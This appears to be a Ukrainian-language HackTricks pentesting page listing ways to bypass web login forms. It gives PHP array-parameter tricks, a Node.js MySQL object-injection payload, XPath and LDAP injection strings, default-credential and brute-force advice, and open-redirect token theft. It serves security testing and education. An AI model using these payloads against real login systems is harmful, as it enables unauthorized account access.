Login Bypass
Reading time: 4 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Обхід звичайного входу
Якщо ви знайшли сторінку входу, тут ви можете знайти деякі техніки, щоб спробувати обійти її:
- Перевірте коментарі на сторінці (прокрутіть вниз і вправо?)
- Перевірте, чи можете ви безпосередньо отримати доступ до обмежених сторінок
- Перевірте, щоб не надсилати параметри (не надсилайте жодного або лише 1)
- Перевірте помилку порівняння PHP:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Змініть тип вмісту на json і надішліть значення json (включаючи bool true)
- Якщо ви отримали відповідь, що POST не підтримується, ви можете спробувати надіслати JSON в тілі, але з GET запитом з
Content-Type: application/json
- Перевірте потенційну помилку парсингу nodejs (прочитайте це):
password[password]=1
- Nodejs перетворить цей payload на запит, подібний до наступного:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
що робить біт пароля завжди істинним. - Якщо ви можете надіслати об'єкт JSON, ви можете надіслати
"password":{"password": 1}
для обходу входу. - Пам'ятайте, що для обходу цього входу вам все ще потрібно знати та надіслати дійсне ім'я користувача.
- Додавання
"stringifyObjects":true
параметра при викликуmysql.createConnection
врешті-решт заблокує всі несподівані поведінки, колиObject
передається в параметрі. - Перевірте облікові дані:
- Типові облікові дані технології/платформи, що використовуються
- Звичайні комбінації (root, admin, password, назва технології, стандартний користувач з одним з цих паролів).
- Створіть словник, використовуючи Cewl, додайте стандартне ім'я користувача та пароль (якщо є) і спробуйте зламати його, використовуючи всі слова як імена користувачів та паролі
- Брутфорс з більшим словником (Брутфорс)
SQL Injection обхід аутентифікації
Тут ви можете знайти кілька трюків для обходу входу через SQL ін'єкції.
На наступній сторінці ви можете знайти кастомний список для спроби обійти вхід через SQL ін'єкції:
No SQL Injection обхід аутентифікації
Тут ви можете знайти кілька трюків для обходу входу через No SQL ін'єкції.
Оскільки NoSQL ін'єкції вимагають зміни значення параметрів, вам потрібно буде протестувати їх вручну.
XPath Injection обхід аутентифікації
Тут ви можете знайти кілька трюків для обходу входу через XPath Injection.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection аутентифікація обхід
Тут ви можете знайти кілька трюків для обходу входу через LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Запам'ятати мене
Якщо на сторінці є функціонал "Запам'ятати мене", перевірте, як він реалізований, і подивіться, чи можете ви його зловживати, щоб взяти під контроль інші облікові записи.
Перенаправлення
Сторінки зазвичай перенаправляють користувачів після входу, перевірте, чи можете ви змінити це перенаправлення, щоб викликати Відкрите перенаправлення. Можливо, ви зможете вкрасти деяку інформацію (коди, куки...), якщо перенаправите користувача на свій веб-сайт.
Інші перевірки
- Перевірте, чи можете ви перерахувати імена користувачів, зловживаючи функціоналом входу.
- Перевірте, чи автозаповнення активне у формах паролів/чутливої інформації введення:
<input autocomplete="false">
Автоматичні інструменти
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.